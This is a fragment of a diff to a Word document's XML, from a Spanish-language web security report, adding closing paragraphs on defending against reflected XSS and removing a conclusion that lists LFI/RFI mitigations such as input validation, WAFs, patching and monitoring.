+        <w:t xml:space="preserve"> revisiones de</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">l código fuente </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>regularmente</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>para identificar cualquier vulnerabilidad XSS Reflected potencial</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> usando </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>herramientas de análisis de código estático y dinámico para ayudar en este proceso.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="357"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="357"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">En resumen, la protección contra ataques XSS Reflected requiere una combinación de prácticas de seguridad efectivas y una conciencia </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>en constante actualización</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> de los riesgos y las vulnerabilidades emergentes. La IA puede ser una herramienta valiosa en la lucha contra los ataques XSS Reflected,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ya que pueden ayudar en la automatización de identificación, detección y análisis de patrones maliciosos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>, ayudando a los analistas de seguridad contra los falsos positivos, así como en la realización de simulacros de ataques, que podría ejecutar la IA de manera automática mostrando finalmente su resultado, etc.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="357"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">En definitiva, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">es importante recordar que la seguridad es un proceso </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">de mejora </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>continu</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a, que </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>requiere una colaboración constante entre los desarrolladores, los expertos en seguridad y las tecnologías emergentes.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7042,50 +7332,17 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
           <w:kern w:val="0"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">4. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>CONCLUSI</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>ÓN</w:t>
-      </w:r>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:firstLine="348"/>
+        <w:ind w:left="360"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
@@ -7096,610 +7353,10 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Las vulnerabilidades de LFI y RFI representan serios riesgos para la seguridad de las aplicaciones web</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>, siendo crucial impl</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ementar prácticas de codificación segura, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>valida</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ción </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>y</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>sanitiza</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ción </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>todas</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> las entradas del usuario y configurar adecuadamente el servidor para mitigar estos riesgos.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Además de todo lo analizado, es interesante implementar</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>medidas me</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> minimicen </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>significativamente el riesgo de ataques RFI y mejorar la seguridad general de la aplicación web</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Prrafodelista"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="33"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>E</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>n el manejo de errores</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> dentro del script PHP</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> indicar </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>que no muestren mensajes de error que puedan revelar información del sistema</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Prrafodelista"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="33"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>E</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>stablecer una política de seguridad con el principio del mínimo privilegio, es decir la información será accesible a los usuarios autenticados, en la medida que le permita realizar su trabajo, no pudiendo acceder a contenido que no sea necesario para el mismo</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Prrafodelista"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="33"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Configurar el servidor web (por ejemplo, Apache) para limitar el acceso a directorios sensibles.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Prrafodelista"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="33"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Uso de </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Firewall de aplicaciones web</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (WAF)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, para </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>ayudar a detectar y bloquear intentos de RFI.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Prrafodelista"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="33"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>M</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>antener actualizado el sistema operativo, el servidor web y PHP para protegerse contra vulnerabilidades conocidas.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Prrafodelista"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="33"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Implementar un sistema de monitor</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>ización</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> para detectar actividades sospechosas</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>, el cual mantenga logs detallados de las solicitudes al servidor.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Prrafodelista"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="33"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
